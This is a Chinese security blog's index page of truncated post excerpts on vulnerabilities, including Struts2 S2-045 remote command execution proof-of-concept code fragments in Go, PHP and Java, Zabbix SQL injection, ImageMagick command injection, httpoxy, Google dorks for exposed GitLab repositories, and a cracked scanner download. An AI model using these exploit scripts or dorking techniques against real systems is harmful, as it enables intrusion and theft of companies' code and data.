Author: Orange Tsai(@orange_8361) from DEVCORE
Recently, I reviewed several Web frameworks and language implementations, and found some vulnerabilities.
This is an simple and interesting case, and seems easy to exploit in real world!
Affected
All PHP version
PHP 5 < 5.6.33
PHP 7.0 < 7.0.27
PHP 7.1 < 7.1.13
PHP 7.2 < 7.2.1
Vulnerability Details
The vulnerability is on the file ext...
CVE-2018-5711, GD漏洞阅读全文
其实Struts2代码执行原理很简单, 再来一个golang版的 , 不用怀疑, 我写这么多版本其实就是用来搞笑的
package main
import (
"fmt"
"os"
"net/http"
"io/ioutil"
"strings"
)
func httpGet(url, commend string) (result string) {
var ret string
if "http" != substr(url, 0 , 4) {
url = "http://" + url
}
resp, err := http.Get(url)
if err != nil {
ret = "网站无法正常打开!"
}
defer resp.Body.Clo...
S2-045 for golang, Struts2爆远程代码执行漏洞阅读全文
/**
* Created by IntelliJ IDEA.
* User: jisec.com
* Date: 2017/3/7
* Time: 下午4:45
*/
function getContext($url, $content, $commend){
$ret = http_request($url, null, $commend);
printf($ret);
};
function http_request($url, $data = null, $commend = "whoami")
{
$curl = curl_init();
$header[0] = "Accept: text/xml,application/xml,application/xhtml+xml,";
$header[0] .= "text/html;q=0.9,text...
CVE-2017-5638, S2-045阅读全文
https://github.com/Mofree/SecurityTools/tree/master/script
package demo;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;
public class Stpoc {
public Stpoc() {
}
public static String getContext(URL url, String encode, String commend) {
StringBuffer contentBuffe...
CVE-2017-5638, S2-045, Struts2爆远程代码执行漏洞阅读全文
Zabbix SQL Injection
zabbix(音同 zæbix)是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。
就在昨天,Freebuf爆出了Zabbix的最新SQL注入漏洞,详情请查看:http://www.freebuf.com/vuls/112197.html
影响程度
影响范围:2.2.x, 3.0.0-3.0.3。(其他版本未经测试)
漏洞条件:系统未禁止Guest用户
攻击成本:低
漏洞危害:高
漏洞分析
在Zabbix中有两个文件存在SQL注入漏洞,分别是jsrpc.php...
zabbix, zabbix新0day, zabbix爆最新0day阅读全文
httpoxy远程代理感染,CGI应用程序的漏洞
影响范围使用php,python,go做CGI服务
漏洞详情及利用方式
http://m.bobao.360.cn/learning/detail/2903.html
http://zone.wooyun.org/content/28533
漏洞公布地址
https://httpoxy.org/
漏洞测试脚本 https://access.redhat.com/security/vulnerabilities/httpoxy
测试方式
在 Apache httpd.conf
寻找其中一行如:
# ScriptAlias /cgi-bin/ "/usr/local/apache2/cgi-bin/"
看是否...
CGI应用程序的漏洞阅读全文
ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。
国外的安全人员为此新建了一个网站: https://imagetragick.com/ ,不得不说,有些外国人蛮会玩的。
相对于之前的数个拥有『主页』的漏洞,这个洞确实不一般,确实是一个可以被利用的好洞,乌云主...
CVE-2016-3714, ImageMagick阅读全文
蚊子
嗡嗡嗡。
ImageMagick
ImageMagick 昨天曝出 CVE-2016-3714,Java、PHP 的库也受其影响。其中 PHP 的库 Imagick 应用广泛,波及也大。Wordpress 也就是受此漏洞影响出现了 RCE。
这个漏洞很蠢,ImageMagick 在 MagickCore/constitute.c 的 ReadImage 函数中解析图片,如果图片地址是 https:// 开头的,即调用 InvokeDelegate。
MagickCore/delegate.c 定义了委托,第 99 行定义了要执行的命令。
最终 InvokeDelegate 调用 ...
ImageMagick漏洞, ImageMagick漏洞POC, ImageMagick漏洞利用, Wordpress 4.5.1漏洞, Wordpress 4.5.1的远程命令执行阅读全文
GitLab 是一个用于仓库管理系统的开源项目。越来越多的公司使用Git作为代码管理工具,并在此基础上搭建起来的web服务,且允许外网访问,这就出现个问题,开发人员一般不会注意是否将代码public了,只要项目权限开源,这样公司的代码就处在人人都能下载,且看下面
利用Google hack site:*.cn/public/projects/
找到带cn的域名的git库
风云直播 章鱼TV 各种配置文件
发现找到的不是很多, 于是分析gitlab 首页具有特征性的标志,
GitLab...
GitLab权限 GitLab敏感信息泄露阅读全文
![[原创工具]Falcon子域名扫描工具1.0版本发布](https://static.jisec.com/uploads/2016/04/1111111111111111111111-300x209.png)
.
作者: Falcon
博客: https://www.jisec.com
文件名称 : Falcon子域名扫描工具.exe
文件大小 : 3562496 byte :
文件类型 : application/x-dosexec
MD5:a33c5adba55a5430bfabc40910704e69
SHA1:da3e4d43f6b879d75cfdad71f2f42b83e17b4007
本人开发的一款根据域名查询子域名的工具,渗透必备神器,有返回网站Title,想必不说大家也知道有什么用了吧,扫描出所有的子域名,然后返回服务器状态,服务器类型,子域名网站的Title,这样找出系...
Falcon, Falcon子域名扫描工具, 子域名扫描阅读全文
Netsparker是一款综合型的web应用安全漏洞扫描工具,它分为专业版和免费版,免费版的功能也比较强大。Netsparker与其他综合 性的web应用安全扫描工具相比的一个特点是它能够更好的检测SQL Injection和 Cross-site Scripting类型的安全漏洞。
新版本特性
* DOM跨站脚本漏洞检测
* 基于Chrome浏览器的Dom解析
* URL重写规则
* 可晒出某些不必要的扫描结果
新安全检测功能
* Nginx服务器旧版本检测
* Perl源代码泄露
* Python...
Netsparker 4.0.1.0破解版阅读全文